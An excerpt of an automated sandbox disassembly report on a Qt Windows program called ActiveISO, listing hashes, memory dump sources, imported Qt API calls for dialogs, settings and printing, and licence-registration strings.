                                                                                                                  • Opcode Fuzzy Hash: 6f31604fc06c36bb1e4a2c29a706494abda3fde9def4f799e47a6b3cc5d1079f
                                                                                                                  • Instruction Fuzzy Hash: A9314131A28A81D2E7109F50F8454AAB762FB85F91F441132EA9EA3A78DF3CD549CB44
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?text@FileItem@@LongLong@TreeWidget$Array@CharCloseCreateHandlePointermemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 91055235-0
                                                                                                                  • Opcode ID: 763f8f883afd349a038168d7d6d54c43fb1ca4e427d08ef339d5ee8ce6fa9bfb
                                                                                                                  • Instruction ID: 95706bf0663845c715f072226b8500cc6883b81b35a33050bc834bb47ec09203
                                                                                                                  • Opcode Fuzzy Hash: 763f8f883afd349a038168d7d6d54c43fb1ca4e427d08ef339d5ee8ce6fa9bfb
                                                                                                                  • Instruction Fuzzy Hash: 3E61B325F28A8196E714DB22E95136A73A2FB85F90F484135EE9EB3750CF3CE419C748
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF653743EE0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653743F07
                                                                                                                    • Part of subcall function 00007FF653743EE0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653743F2E
                                                                                                                    • Part of subcall function 00007FF653743EE0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653743F51
                                                                                                                    • Part of subcall function 00007FF653743EE0: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653743F5D
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742B9C
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742BA8
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742BBF
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742BE6
                                                                                                                  • ?remove@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653742BFB
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742C07
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742C19
                                                                                                                  • ?remove@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653742C2E
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742C3A
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742C4C
                                                                                                                  • ?remove@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653742C61
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742C6D
                                                                                                                  • ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF653742C79
                                                                                                                    • Part of subcall function 00007FF653744040: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653744067
                                                                                                                    • Part of subcall function 00007FF653744040: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374408E
                                                                                                                    • Part of subcall function 00007FF653744040: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537440B1
                                                                                                                    • Part of subcall function 00007FF653744040: ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF6537440BD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Data@Typed$Settings@@$?remove@String@@@
                                                                                                                  • String ID: Activated$ActiveRequest$ActiveResponse
                                                                                                                  • API String ID: 3701553269-2282569860
                                                                                                                  • Opcode ID: a38fcfaae124581fc904dfbd011fe976e9d4197369b7db01bbef223ebb0ed5cd
                                                                                                                  • Instruction ID: 1017e80f9a5b2e4a8116ced705c5c8d4efd5d5c626521ed9115d5cee756216ff
                                                                                                                  • Opcode Fuzzy Hash: a38fcfaae124581fc904dfbd011fe976e9d4197369b7db01bbef223ebb0ed5cd
                                                                                                                  • Instruction Fuzzy Hash: 68315432E28A4192E710DB50E456279B762FBD0B51F484131E19EF3AB4EF7CD549C744
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$Item@@TreeWidget$?child?child@?set?text@Char@@@Count@Long@String@@@Text@$?arg@?fromArrayAscii_helper@Char@@Data@Latin1LongTypedV1@_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 781623977-0
                                                                                                                  • Opcode ID: 0ef8fd3a91947d61ed5c9856e289d44ef2013c999f219dd16da6f33cc23eb622
                                                                                                                  • Instruction ID: 512f58f71fee487a3be350fb8f4a1c744f6828e5d85d46df964ebc34cfc7ce33
                                                                                                                  • Opcode Fuzzy Hash: 0ef8fd3a91947d61ed5c9856e289d44ef2013c999f219dd16da6f33cc23eb622
                                                                                                                  • Instruction Fuzzy Hash: 5F417122E28A0297F7009B65E8461697363FB85FC1F584031DA0EE3B24DF3CD54AC748
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Text$File@@$Dialog@@Edit@@PrintPrinter@@Stream@@String@@@$?setBrowser@@Device@@@String@@Text@Widget@@@$?exec@?exists@?open@?print@?readAcceptAll@Device@@@@@Flag@Flags@ModeMode@0@@OpenPagedPaintPrinterRich
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4157023558-0
                                                                                                                  • Opcode ID: a42505c969f8e482a01244fca88320d69e26bfbffb0f7f5d21b555db4fa41638
                                                                                                                  • Instruction ID: 92de079fa7d7f99195d0d8e4f23e7693fe3726be0deabda39b0eb3d7b1d5481a
                                                                                                                  • Opcode Fuzzy Hash: a42505c969f8e482a01244fca88320d69e26bfbffb0f7f5d21b555db4fa41638
                                                                                                                  • Instruction Fuzzy Hash: 78314121A28942A2EB10DF54E8552A96332FBD6B56F841131D28FF25B8DF2CD94DC744
                                                                                                                  APIs
                                                                                                                  • ??0QDialog@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65373B67A
                                                                                                                  • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FF65373B69A
                                                                                                                    • Part of subcall function 00007FF65373BC00: ?objectName@QObject@@QEBA?AVQString@@XZ.QT5CORE(?,?,?,?,?,?,?,00007FF65373B6AD), ref: 00007FF65373BC28
                                                                                                                    • Part of subcall function 00007FF65373BC00: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FF65373B6AD), ref: 00007FF65373BC39
                                                                                                                    • Part of subcall function 00007FF65373BC00: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,00007FF65373B6AD), ref: 00007FF65373BC52
                                                                                                                    • Part of subcall function 00007FF65373BC00: ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,00007FF65373B6AD), ref: 00007FF65373BC5F
                                                                                                                    • Part of subcall function 00007FF65373BC00: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FF65373B6AD), ref: 00007FF65373BC6A
                                                                                                                    • Part of subcall function 00007FF65373BC00: ?setWindowModality@QWidget@@QEAAXW4WindowModality@Qt@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00007FF65373B6AD), ref: 00007FF65373BC78
                                                                                                                    • Part of subcall function 00007FF65373BC00: ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS(?,?,?,?,?,?,?,00007FF65373B6AD), ref: 00007FF65373BC8C
                                                                                                                    • Part of subcall function 00007FF65373BC00: ??0QSize@@QEAA@HH@Z.QT5CORE(?,?,?,?,?,?,?,00007FF65373B6AD), ref: 00007FF65373BCA1
                                                                                                                    • Part of subcall function 00007FF65373BC00: ?setMinimumSize@QWidget@@QEAAXAEBVQSize@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00007FF65373B6AD), ref: 00007FF65373BCAD
                                                                                                                    • Part of subcall function 00007FF65373BC00: ??0QSize@@QEAA@HH@Z.QT5CORE(?,?,?,?,?,?,?,00007FF65373B6AD), ref: 00007FF65373BCC2
                                                                                                                    • Part of subcall function 00007FF65373BC00: ?setMaximumSize@QWidget@@QEAAXAEBVQSize@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00007FF65373B6AD), ref: 00007FF65373BCCE
                                                                                                                    • Part of subcall function 00007FF65373BC00: ??0QLabel@@QEAA@PEAVQWidget@@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,?,?,00007FF65373B6AD), ref: 00007FF65373BCEE
                                                                                                                    • Part of subcall function 00007FF65373BC00: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,00007FF65373B6AD), ref: 00007FF65373BD1D
                                                                                                                    • Part of subcall function 00007FF65373BC00: ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,00007FF65373B6AD), ref: 00007FF65373BD2A
                                                                                                                    • Part of subcall function 00007FF65373BC00: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,00007FF65373B6AD), ref: 00007FF65373BD35
                                                                                                                    • Part of subcall function 00007FF65373BC00: ??0QRect@@QEAA@HHHH@Z.QT5CORE ref: 00007FF65373BD56
                                                                                                                    • Part of subcall function 00007FF65373BC00: ?setGeometry@QWidget@@QEAAXAEBVQRect@@@Z.QT5WIDGETS ref: 00007FF65373BD62
                                                                                                                    • Part of subcall function 00007FF65373BC00: ?setTextFormat@QLabel@@QEAAXW4TextFormat@Qt@@@Z.QT5WIDGETS ref: 00007FF65373BD6D
                                                                                                                    • Part of subcall function 00007FF65373BC00: ?setAlignment@QLabel@@QEAAXV?$QFlags@W4AlignmentFlag@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65373BD7B
                                                                                                                    • Part of subcall function 00007FF65373BC00: ??0QPushButton@@QEAA@PEAVQWidget@@@Z.QT5WIDGETS ref: 00007FF65373BD98
                                                                                                                  • ?setTextFormat@QLabel@@QEAAXW4TextFormat@Qt@@@Z.QT5WIDGETS ref: 00007FF65373B6B3
                                                                                                                  • ?setWindowFlags@QWidget@@QEAAXV?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS ref: 00007FF65373B6C1
                                                                                                                  • ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS ref: 00007FF65373B6D5
                                                                                                                    • Part of subcall function 00007FF653769FB8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,FFFFFFFF,00007FF65371257E), ref: 00007FF653769FD2
                                                                                                                    • Part of subcall function 00007FF65373C170: ??0QWidget@@QEAA@PEAV0@V?$QFlags@W4WindowType@Qt@@@@@Z.QT5WIDGETS(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C182
                                                                                                                    • Part of subcall function 00007FF65373C170: ?setVisible@QWidget@@UEAAX_N@Z.QT5WIDGETS(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1A3
                                                                                                                    • Part of subcall function 00007FF65373C170: ?objectName@QObject@@QEBA?AVQString@@XZ.QT5CORE(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1B5
                                                                                                                    • Part of subcall function 00007FF65373C170: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1C6
                                                                                                                    • Part of subcall function 00007FF65373C170: ?fromUtf8@QString@@SA?AV1@PEBDH@Z.QT5CORE(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1E0
                                                                                                                    • Part of subcall function 00007FF65373C170: ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1ED
                                                                                                                    • Part of subcall function 00007FF65373C170: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C1F9
                                                                                                                    • Part of subcall function 00007FF65373C170: ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS(?,?,?,?,?,00007FF65373B6F8), ref: 00007FF65373C20B
                                                                                                                    • Part of subcall function 00007FF65373C170: ?translate@QCoreApplication@@SA?AVQString@@PEBD00H@Z.QT5CORE ref: 00007FF65373C22F
                                                                                                                    • Part of subcall function 00007FF65373C170: ?setWindowTitle@QWidget@@QEAAXAEBVQString@@@Z.QT5WIDGETS ref: 00007FF65373C23C
                                                                                                                    • Part of subcall function 00007FF65373C170: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF65373C248
                                                                                                                    • Part of subcall function 00007FF65373C170: ?connectSlotsByName@QMetaObject@@SAXPEAVQObject@@@Z.QT5CORE ref: 00007FF65373C251
                                                                                                                    • Part of subcall function 00007FF65373C170: ??0QTimer@@QEAA@PEAVQObject@@@Z.QT5CORE ref: 00007FF65373C276
                                                                                                                    • Part of subcall function 00007FF65373C170: ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF65373C2B0
                                                                                                                    • Part of subcall function 00007FF65373C170: ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF65373C2BB
                                                                                                                  • ?resize@QWidget@@QEAAXHH@Z.QT5WIDGETS ref: 00007FF65373B708
                                                                                                                  • ?move@QWidget@@QEAAXAEBVQPoint@@@Z.QT5WIDGETS ref: 00007FF65373B727
                                                                                                                  • ?move@QWidget@@QEAAXAEBVQPoint@@@Z.QT5WIDGETS ref: 00007FF65373B746
                                                                                                                  • ??4QString@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FF65373B757
                                                                                                                    • Part of subcall function 00007FF653769FB8: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF653769FE8
                                                                                                                    • Part of subcall function 00007FF653769FB8: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF653769FEE
                                                                                                                  • ??0QTimer@@QEAA@PEAVQObject@@@Z.QT5CORE ref: 00007FF65373B775
                                                                                                                  • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FF65373B7AF
                                                                                                                  • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FF65373B7BA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Widget@@$String@@$?set$Object@@$Window$Flags@Name@Type@$MetaQt@@@Qt@@@@@$?resize@Connection@Format@Label@@String@@@Text$?fromObjectObject@@@Utf8@$?connect@?move@?objectConcurrency::cancel_current_taskConnectionModality@Point@@@Size@Size@@Size@@@Timer@@$?connect?translate@AlignmentAlignment@Application@@Button@@CoreDialog@@Flag@Geometry@MaximumMinimumPushRect@@Rect@@@SlotsTitle@Visible@Widget@@@malloc
                                                                                                                  • String ID: 1setEraseProc()$2timeout()$<
                                                                                                                  • API String ID: 2270546216-1047748305
                                                                                                                  • Opcode ID: 108e0491b99d2c431b1f934efce2072b2708649360191d2c9b9345c19c88679d
                                                                                                                  • Instruction ID: 6117e0ecac8f87d0ba5680e440f062dbb1974496d013f08f112d5d1489f63924
                                                                                                                  • Opcode Fuzzy Hash: 108e0491b99d2c431b1f934efce2072b2708649360191d2c9b9345c19c88679d
                                                                                                                  • Instruction Fuzzy Hash: A8419231A28B4283FB109F51F84526AB366FB85F95F444035DA8EA3B68DF7CE109C744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • Software can be installed and registered on the number of computers matching the number of licenses purchased., xrefs: 00007FF6537537E9
                                                                                                                  • Removing local software registration frees the license and let you use this license on the another computer., xrefs: 00007FF65375382C
                                                                                                                  • This software is licensed under the <a href='%1'>License Agreement</a> terms<br><br>, xrefs: 00007FF65375378A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?append@AbstractButton@@Char@@@Checked@V1@@$?arg@?set?tr@Char@@Label@@Latin1MetaObject@@String@@@Text@
                                                                                                                  • String ID: Removing local software registration frees the license and let you use this license on the another computer.$Software can be installed and registered on the number of computers matching the number of licenses purchased.$This software is licensed under the <a href='%1'>License Agreement</a> terms<br><br>
                                                                                                                  • API String ID: 165622110-599415983
                                                                                                                  • Opcode ID: 75677a53fc84b2a4b5475856ab93a9b3e1e950b6be62499237170c0df91a038b
                                                                                                                  • Instruction ID: 8725d65ab4750c58986474f48e87d3a93ae854dbcea72a60cb743936d2d4ac84
                                                                                                                  • Opcode Fuzzy Hash: 75677a53fc84b2a4b5475856ab93a9b3e1e950b6be62499237170c0df91a038b
                                                                                                                  • Instruction Fuzzy Hash: 42316732E28A02D3FA049B64F8925696722FF81F61F441131E65EB79F4DF2CE549C744
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537424CB
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??0QSettings@@QEAA@AEBVQString@@W4Format@0@PEAVQObject@@@Z.QT5CORE ref: 00007FF653746CE1
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?setIniCodec@QSettings@@QEAAXPEBD@Z.QT5CORE ref: 00007FF653746CFC
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746D17
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?beginGroup@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653746D2A
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D36
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D4E
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF6537424EF
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653742506
                                                                                                                  • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FF65374251C
                                                                                                                  • ?replace@QString@@QEAAAEAV1@AEBV1@0W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FF653742539
                                                                                                                  • ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE ref: 00007FF653742547
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374255A
                                                                                                                  • ?setValue@QSettings@@QEAAXAEBVQString@@AEBVQVariant@@@Z.QT5CORE ref: 00007FF65374257A
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653742589
                                                                                                                  • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FF653742595
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537425A1
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537425B0
                                                                                                                  • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF6537425BC
                                                                                                                  • ??1QSettings@@UEAA@XZ.QT5CORE ref: 00007FF6537425C8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000008.00000002.1341205041.00007FF653711000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF653710000, based on PE: true
                                                                                                                  • Associated: 00000008.00000002.1341125497.00007FF653710000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF653773000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341614210.00007FF6537E1000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341632616.00007FF6537E4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341683179.00007FF6537E5000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000008.00000002.1341720320.00007FF6537E9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_8_2_7ff653710000_ActiveISO.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String@@$?fromArrayAscii_helper@Data@Settings@@Typed$?setString@@@Variant@@$?begin?replace@Array@@ByteCaseCodec@Format@0@Group@Object@@@Qt@@@Sensitivity@V0@@V1@0Value@Variant@@@
                                                                                                                  • String ID: ActiveResponse
                                                                                                                  • API String ID: 1163770662-4251798550
                                                                                                                  • Opcode ID: 135bb0029121c43df3e33e549be2edbcc0322b849f0ed4a333a9778d33a17ace
                                                                                                                  • Instruction ID: d5d9f9be2bc6addbf423b25592367d2de57e9c8a0e3254419b7ed7a4a1c4d038
                                                                                                                  • Opcode Fuzzy Hash: 135bb0029121c43df3e33e549be2edbcc0322b849f0ed4a333a9778d33a17ace
                                                                                                                  • Instruction Fuzzy Hash: 2F312332A1894192E710DB60F8562AA7722FBD5F51F844131E19FE2A74DF3CD54DC784
                                                                                                                  APIs
                                                                                                                  • ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF65374239B
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??0QSettings@@QEAA@AEBVQString@@W4Format@0@PEAVQObject@@@Z.QT5CORE ref: 00007FF653746CE1
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?setIniCodec@QSettings@@QEAAXPEBD@Z.QT5CORE ref: 00007FF653746CFC
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?fromAscii_helper@QString@@CAPEAU?$QTypedArrayData@G@@PEBDH@Z.QT5CORE ref: 00007FF653746D17
                                                                                                                    • Part of subcall function 00007FF653746CB0: ?beginGroup@QSettings@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FF653746D2A
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D36
                                                                                                                    • Part of subcall function 00007FF653746CB0: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FF653746D4E
